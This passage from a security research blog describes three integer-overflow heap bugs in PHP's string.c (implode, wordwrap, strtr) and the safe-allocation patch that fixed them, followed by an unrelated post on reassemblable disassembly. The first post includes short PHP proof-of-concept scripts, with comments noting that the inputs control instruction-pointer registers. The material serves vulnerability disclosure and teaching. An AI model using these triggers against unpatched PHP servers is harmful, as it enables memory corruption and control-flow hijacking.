<span class="w"> </span><span class="n">str</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zend_string_alloc</span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">numelems</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">delim</span><span class="p">),</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div>
<p>A vulnerable example is in the <code>php_implode</code> function.
The function invokes <code>zend_string_alloc</code> with the following arithmetic expression
as the length argument: <code>len</code> + (<code>numelems</code> - 1) * <code>ZSTR_LEN(delim)</code></p>
<p>An integer overflow can arise in the expression if the values are carefully
manimulated. For instance, in case when the size of string <code>delim</code> is 65,536,
number of elements are 65,536, and the length of the string <code>len</code> is 65,536,
then the size value will be zero (65536 + 65535 * 65536) = 4294967296 = 0</p>
<p>The following code shows the proof-of-concept (PoC) that exploits the
vulnerability.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="nv">$arr</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o"><</span><span class="mi">65536</span><span class="p">;</span> <span class="o">++</span><span class="nv">$i</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$arr</span><span class="p">[</span><span class="nv">$i</span><span class="p">]</span><span class="o">=</span> <span class="s2">"aa"</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$text1</span> <span class="o">=</span> <span class="nb">str_repeat</span><span class="p">(</span><span class="s2">"ABCD"</span><span class="p">,</span> <span class="mi">16384</span><span class="p">);</span>
<span class="c1">// Changing ABCD into other values will alter %eax and %ecx.</span>
<span class="nv">$str</span> <span class="o">=</span> <span class="nb">implode</span><span class="p">(</span><span class="nv">$text1</span><span class="p">,</span> <span class="nv">$arr</span><span class="p">);</span>
<span class="cp">?></span>
</code></pre></div>
<p>Exploiting the vulnerability requires the size of strings for the arguments
to be matched to overflow, as mentioned above. First, we build the string $text1
to be 65,536 sized string (ABCD is repeated 16,384 times).</p>
<p>We searched for similar cases (i.e., use of zend_string_alloc with multiplication
expression) in <code>ext/standard/string.c</code> file, we found three of such cases, and
successfully create control-flow hijacking exploits for all cases.</p>
<h2>php_wordwrap()</h2>
<div class="highlight"><pre><span></span><code><span class="c1">// ext/standard/string.c</span>
<span class="n">PHP_FUNCTION</span><span class="p">(</span><span class="n">wordwrap</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="c1">// ...</span>
<span class="w"> </span><span class="c1">// allocate string into newtext variable</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">linelength</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">chk</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="o">/</span><span class="n">linelength</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span>
<span class="w"> </span><span class="n">newtext</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zend_string_alloc</span><span class="p">(</span><span class="n">chk</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">breakchar_len</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">text</span><span class="p">),</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span>
<span class="w"> </span><span class="n">alloced</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">chk</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">breakchar_len</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">chk</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="w"> </span><span class="n">alloced</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">(</span><span class="n">breakchar_len</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="n">newtext</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zend_string_alloc</span><span class="p">(</span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">(</span><span class="n">breakchar_len</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">),</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="c1">// ...</span>
<span class="w"> </span><span class="c1">// do multiple memcpy()...</span>
<span class="w"> </span><span class="k">if</span><span class="p">(...)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">newtext</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">newtextlen</span><span class="p">,</span><span class="w"> </span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">laststart</span><span class="p">,</span><span class="w"> </span><span class="n">current</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">laststart</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">breakchar_len</span><span class="p">);</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">newtext</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">newtextlen</span><span class="p">,</span><span class="w"> </span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">laststart</span><span class="p">,</span><span class="w"> </span><span class="n">current</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">laststart</span><span class="p">);</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">newtext</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">newtextlen</span><span class="p">,</span><span class="w"> </span><span class="n">breakchar</span><span class="p">,</span><span class="w"> </span><span class="n">breakchar_len</span><span class="p">);</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">newtext</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">newtextlen</span><span class="p">,</span><span class="w"> </span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">laststart</span><span class="p">,</span><span class="w"> </span><span class="n">current</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">laststart</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>In the code, <code>wordwrap()</code> allocates memory for new string by calling
<code>zend_string_alloc</code>, with size argument as either of
<code>chk</code> * <code>breakchar_len</code> + <code>ZSTR_LEN(text)</code> or
<code>ZSTR_LEN(text)</code> * (<code>breakchar_len</code> + 1).</p>
<p>The expression for the size argument can cause a condition of integer overflow.
In the second expression (<code>ZSTR_LEN(text)</code> * (<code>breakchar_len</code> + 1)),
if the attacker forges the argument as 65,536 (2^16) character string for text,
and 65,535 (2^16 - 1) character string as breakchar, then
the resulting value will be (65,536) * (65,535 + 1) = 4294967296 = 0.</p>
<p>In such a case, <code>zend_string_alloc</code> will allocate a zero sized buffer
(actually, a little bigger than zero because it is aligned by Zend object size),
and then subsequnt <code>memcpy</code> will overwrite the heap buffer.</p>
<p>Proof-of-Concept code for triggering the vulnerability is in the following.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="nv">$text1</span> <span class="o">=</span> <span class="nb">str_repeat</span><span class="p">(</span><span class="s2">"A"</span><span class="p">,</span> <span class="mi">65536</span><span class="p">);</span>
<span class="nv">$text2</span> <span class="o">=</span> <span class="nb">str_repeat</span><span class="p">(</span><span class="s2">"B"</span><span class="p">,</span> <span class="mi">65536</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="nv">$newtext</span> <span class="o">=</span> <span class="nb">wordwrap</span><span class="p">(</span><span class="nv">$text1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="nv">$text2</span><span class="p">);</span>
<span class="cp">?></span>
</code></pre></div>
<p>By configuring the length of string arguments as 65,536 and 65,535 respectively,
the subsequent <code>memcpy</code> inside wordwrap function will overflow the heap objects.</p>
<h1>php_str_to_str_ex()</h1>
<div class="highlight"><pre><span></span><code><span class="c1">// ext/standard/string.c</span>
<span class="k">static</span><span class="w"> </span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="nf">php_str_to_str_ex</span><span class="p">(</span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="n">haystack</span><span class="p">,</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">needle</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">needle_len</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">str</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">str_len</span><span class="p">,</span><span class="w"> </span><span class="n">zend_long</span><span class="w"> </span><span class="o">*</span><span class="n">replace_count</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="c1">//...</span>
<span class="w"> </span><span class="c1">// count is the value that how many times needle appears in the haystack</span>
<span class="w"> </span><span class="n">new_str</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zend_string_alloc</span><span class="p">(</span><span class="n">count</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">(</span><span class="n">str_len</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">needle_len</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">haystack</span><span class="p">),</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span>
<span class="w"> </span><span class="c1">//...</span>
<span class="w"> </span><span class="n">e</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">s</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">new_str</span><span class="p">);</span>
<span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">haystack</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">haystack</span><span class="p">);</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ZSTR_VAL</span><span class="p">(</span><span class="n">haystack</span><span class="p">);</span><span class="w"> </span><span class="p">(</span><span class="n">r</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">php_memnstr</span><span class="p">(</span><span class="n">p</span><span class="p">,</span><span class="w"> </span><span class="n">needle</span><span class="p">,</span><span class="w"> </span><span class="n">needle_len</span><span class="p">,</span><span class="w"> </span><span class="n">end</span><span class="p">));</span><span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">r</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">needle_len</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">e</span><span class="p">,</span><span class="w"> </span><span class="n">p</span><span class="p">,</span><span class="w"> </span><span class="n">r</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">p</span><span class="p">);</span>
<span class="w"> </span><span class="n">e</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">r</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">p</span><span class="p">;</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">e</span><span class="p">,</span><span class="w"> </span><span class="n">str</span><span class="p">,</span><span class="w"> </span><span class="n">str_len</span><span class="p">);</span>
<span class="w"> </span><span class="n">e</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">str_len</span><span class="p">;</span>
<span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">replace_count</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">p</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">end</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">e</span><span class="p">,</span><span class="w"> </span><span class="n">p</span><span class="p">,</span><span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">p</span><span class="p">);</span>
<span class="w"> </span><span class="n">e</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">p</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="c1">//...</span>
<span class="p">}</span>
</code></pre></div>
<p>The variable <code>new_str</code> is allocated with <code>zend_string_alloc</code>, with the
multiplicative expression: <code>count</code> * (<code>str_len</code> - <code>needle_len</code>) + <code>ZSTR_LEN(haystack)</code>.
If the value is overflowed, thus allocates smaller size than the expected one,
the following memcpy in the for loop causes heap overflow.</p>
<p>The PoC code for exploiting the bug is in the following.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="nv">$a</span> <span class="o">=</span> <span class="nb">str_repeat</span><span class="p">(</span><span class="s1">'A'</span><span class="p">,</span> <span class="mi">65536</span><span class="p">);</span>
<span class="nv">$b</span> <span class="o">=</span> <span class="nb">str_repeat</span><span class="p">(</span><span class="s1">'ABCD'</span><span class="p">,</span> <span class="mi">32768</span><span class="p">);</span>
<span class="c1">// Changing 'ABCD' into other value alters %eip to arbitrary value.</span>
<span class="nv">$c</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">'AA'</span><span class="o">=></span> <span class="nv">$b</span><span class="p">);</span>
<span class="nb">strtr</span><span class="p">(</span><span class="nv">$a</span> <span class="p">,</span> <span class="nv">$c</span><span class="p">);</span>
<span class="cp">?></span>
</code></pre></div>
<p>The haystack becomes a string with the length of 65,536,
the <code>needle</code> is 'AA', so the <code>count</code> is 32,768 ('A'*65,536 can be splitted into
32,768 of 'AA's), and <code>str_len</code> is 131,072 ('ABCD' * 32768 = 131071).
Therefore, the resulting expression in the <code>zend_string_alloc</code> is
32768 * (131072 - 2) + 65536 = 4294967296 = 0.
Since the string object is allocated as size zero,
running <code>memcpy</code> over the object in the for-loop will trigger
heap overflow.</p>
<h2>A Patch: zend_string_safe_alloc()</h2>
<p>We reported those three vulnerability to PHP, and all of the bugs are
patched in PHP v7.0.4. The patches were very simple, just changing <code>zend_string_alloc</code>
to <code>zend_string_safe_alloc</code>. Let's take a look how this can prevent the integer
overflow bugs.</p>
<div class="highlight"><pre><span></span><code><span class="c1">//zend_string.h</span>
<span class="k">static</span><span class="w"> </span><span class="n">zend_always_inline</span><span class="w"> </span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="n">zend_string_safe_alloc</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">n</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">m</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">persistent</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="c1">// calls _safe_malloc</span>
<span class="w"> </span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="n">ret</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">safe_pemalloc</span><span class="p">(</span><span class="n">n</span><span class="p">,</span><span class="w"> </span><span class="n">m</span><span class="p">,</span><span class="w"> </span><span class="n">ZEND_MM_ALIGNED_SIZE</span><span class="p">(</span><span class="n">_ZSTR_STRUCT_SIZE</span><span class="p">(</span><span class="n">l</span><span class="p">)),</span><span class="w"> </span><span class="n">persistent</span><span class="p">);</span>
<span class="w"> </span><span class="n">GC_REFCOUNT</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="c1">//...</span>
<span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">n</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">m</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// zend_alloc.c</span>
<span class="c1">// _safe_malloc calls zend_safe_address to check if n*m overflows.</span>
<span class="n">ZEND_API</span><span class="w"> </span><span class="kt">void</span><span class="o">*</span><span class="w"> </span><span class="n">ZEND_FASTCALL</span><span class="w"> </span><span class="n">_safe_malloc</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">nmemb</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="c1">// calls safe_address</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pemalloc</span><span class="p">(</span><span class="n">safe_address</span><span class="p">(</span><span class="n">nmemb</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="n">offset</span><span class="p">),</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span><span class="w"> </span><span class="n">zend_always_inline</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">safe_address</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">nmemb</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">overflow</span><span class="p">;</span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">ret</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zend_safe_address</span><span class="p">(</span><span class="n">nmemb</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="n">offset</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">overflow</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">UNEXPECTED</span><span class="p">(</span><span class="n">overflow</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">zend_error_noreturn</span><span class="p">(</span><span class="n">E_ERROR</span><span class="p">,</span><span class="w"> </span><span class="s">"Possible integer overflow in memory allocation (%zu * %zu + %zu)"</span><span class="p">,</span><span class="w"> </span><span class="n">nmemb</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="n">offset</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// zend_multiply.h</span>
<span class="k">static</span><span class="w"> </span><span class="n">zend_always_inline</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">zend_safe_address</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">nmemb</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">offset</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="n">overflow</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">nmemb</span><span class="p">;</span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">m_overflow</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">__asm__</span><span class="w"> </span><span class="p">(</span><span class="s">"mull %3</span><span class="se">\n\t</span><span class="s">addl %4,%0</span><span class="se">\n\t</span><span class="s">adcl $0,%1"</span>
<span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"=&a"</span><span class="p">(</span><span class="n">res</span><span class="p">),</span><span class="w"> </span><span class="s">"=&d"</span><span class="w"> </span><span class="p">(</span><span class="n">m_overflow</span><span class="p">)</span>
<span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"%0"</span><span class="p">(</span><span class="n">res</span><span class="p">),</span>
<span class="w"> </span><span class="s">"rm"</span><span class="p">(</span><span class="n">size</span><span class="p">),</span>
<span class="w"> </span><span class="s">"rm"</span><span class="p">(</span><span class="n">offset</span><span class="p">));</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">UNEXPECTED</span><span class="p">(</span><span class="n">m_overflow</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="o">*</span><span class="n">overflow</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="o">*</span><span class="n">overflow</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">res</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>Contrary to <code>zend_string_alloc</code> that gets multiplicative expression as the
argument, <code>zend_string_safe_alloc</code> gets the factors of the size, and internally
apply the multiplication to calculate the size. In particular, the function
<code>zend_string_safe_alloc</code> calls <code>_safe_malloc</code>, and inside of that,
the function calls <code>safe_address</code>, which will finally call <code>zend_safe_address</code>.
In the function <code>zend_safe_address</code>, the assembly code placed in the middle
actually check if the multiplication of the factor generates integer overflow.
If overflow arise, the allocation will fail with error message
(at the code of <code>if (UNEXPECTED(overflow))</code> in <code>safe_address()</code>).
Therefore, these integer overflow vulnerabilities no longer exist in the
latest version of PHP.</p>
<p>[1] Thompson, K. (1984). Reflections on trusting trust. Communications of the ACM, 27(8), 761-763.</p>
<p>[2] Yun, Insu, et al. (2016). APISAN: Sanitizing API Usages through Semantic Cross-checking, In Proceedings of the 25th USENIX Security Symposium (Security), Austin, TX.</p>Tricks to Reassemble Disassembly2015-06-21T17:20:20+02:002015-06-21T17:20:20+02:00Taesootag:gts3.org,2015-06-21:/2015/rasm.html<p>A few tricks to produce relocatable, reassemblable disassembly</p><p>How can we produce re-assemblable disassembly? In other words, why an
assembly generated by <code>objdump</code> can not be compiled by an
assembler like <code>gas</code>? First of all, on CISC-like machines
including x86, it is non-trivial to faithfully disassemble binaries
if obfusticated or self-modifying. Fortunately though, binaries
compiled with typical compilers and programmed with modern style
are not too difficult to disassemble, what we call
commodity off-the-shelf (COTS) binaries. Then, given the correctly
disassembled assembly, what are the remained issues to reproduce a
binary that functions semantically same as the original one.</p>
<p>1) Direct jmp/call</p>
<div class="highlight"><pre><span></span><code><span class="n">jmp</span><span class="w"> </span><span class="mh">0x800000ff</span>
<span class="n">calll</span><span class="w"> </span><span class="mh">0x800000ff</span>
</code></pre></div>
<p>Without precise restriction on instruction layout (via a linker
script), the above assembly code incorrectly behaves after being compiled
if there is single byte misalignment, which we often see a nop-like
(or faulty) gap between two functions.</p>
<p>In fact, the solution is rather simple: <em>symbolize all addresses</em>. For
example, like <code>objdump</code> generated outputs, 1) we first label every single
instruction, and 2) replace an operand (target address) with the
corresponding symbol (label). The above assembly will be
rendered like the below:</p>
<div class="highlight"><pre><span></span><code><span class="mh">0x8000000</span><span class="o">:</span><span class="w"> </span><span class="n">jmp</span><span class="w"> </span><span class="n">A800000ff</span>
<span class="mh">0x8000000</span><span class="o">:</span><span class="w"> </span><span class="n">calll</span><span class="w"> </span><span class="n">A800000ff</span>
<span class="n">A800000ff</span><span class="o">:</span><span class="w"> </span><span class="kc">...</span>
</code></pre></div>
<p>This principle is the foundation, what we called <em>symbolization</em>,
that enable us to produce
reassemblable disassembly from COTS binaries.</p>
<p>2) Indirect jmp/call</p>
<p>The symbolization naturally makes indirect jmp/call instructions
reassemblable as well. Let's consider the below example.</p>
<div class="highlight"><pre><span></span><code><span class="n">movl</span><span class="w"> </span><span class="o">$</span><span class="mh">0x80000ff</span><span class="p">,</span><span class="w"> </span><span class="o">%eax</span>
<span class="o">calll *%</span><span class="n">eax</span>
</code></pre></div>
<p>As far as we correctly symbolize an operand (e.g., a function pointer)
of <code>movl</code> (source of code pointers), we can make the assembly
correctly recompilable.</p>
<div class="highlight"><pre><span></span><code><span class="mh">0x8000000</span><span class="o">:</span><span class="w"> </span><span class="n">movl</span><span class="w"> </span><span class="o">$</span><span class="n">A80000ff</span><span class="p">,</span><span class="w"> </span><span class="o">%eax</span>
<span class="o">0x8000011: calll *%</span><span class="n">eax</span>
<span class="mh">0x80000ff</span><span class="o">:</span><span class="w"> </span><span class="kc">...</span>
</code></pre></div>
<p>Then, how can we identify all instructions that might introduce code
pointers?</p>
<p>3) Operands</p>
<p>To faithfully symbolize all code pointers, we have to interpret every
single operand of instructions; symbolize if it's a code pointer. To
do so, we rely on meta information (<code>X86_OP_IMM</code> or <code>X86_OP_MEM</code>)
generated by <a href="http://www.capstone-engine.org">capstone</a>. For
constant (immediate) addresses or displacement, we could symbolize
them if they point to the code segment that we can extract
from its elf header.</p>
<p>4) Data section</p>
<p>To relocate data section (e.g., .data or .bss), we also have to symbolize
code pointers embedded in the data section (e.g., jump tables, global
variables initialized with a function pointer).</p>
<p>We first scan 4-byte chunk from data section (32-bit binary)
and check if it points to the code section. But we immediately
realize that this is large source of false positives: incorrectly
symbolize the data values (non-code pointers). In some binaries,
in particular when having crypto-related static tables, this false
positive is critical as it changes the semantic of the binary.</p>
<p>To reduce false positives, one can dynamically instrument to figure
out whether the data is used as a code pointer or just data.
However, we decide to statically check its validity with two
conditions: the chunk should point to the valid, well-aligned
instructions (prefix) in the code section,
and a group of code pointers should have a xref in its leading
code pointer (xref is a set of cross-referencing addresses that refer to the current
address).
To do so, we symbolize the address of every single <em>byte</em> of data region
and symbolize four of such if it points to the code segment
<em>and</em> there is an instruction referring to (xref is not empty).
It might become clear if you see the below example.</p>
<div class="highlight"><pre><span></span><code><span class="n">.section</span><span class="w"> </span><span class="n">.data</span>
<span class="n">A80001000</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x00</span>
<span class="n">A80001001</span><span class="o">:</span><span class="w"> </span><span class="n">.byte</span><span class="w"> </span><span class="mh">0x11</span>
<span class="n">A80001002</span><span class="o">:</span><span class="w"> </span><span class="n">A80000000</span><span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="p">{</span><span class="n">xref</span><span class="o">:</span><span class="p">[</span><span class="s">'A800000ee'</span><span class="p">]}</span><span class="w"> </span><span class="o">*/</span>
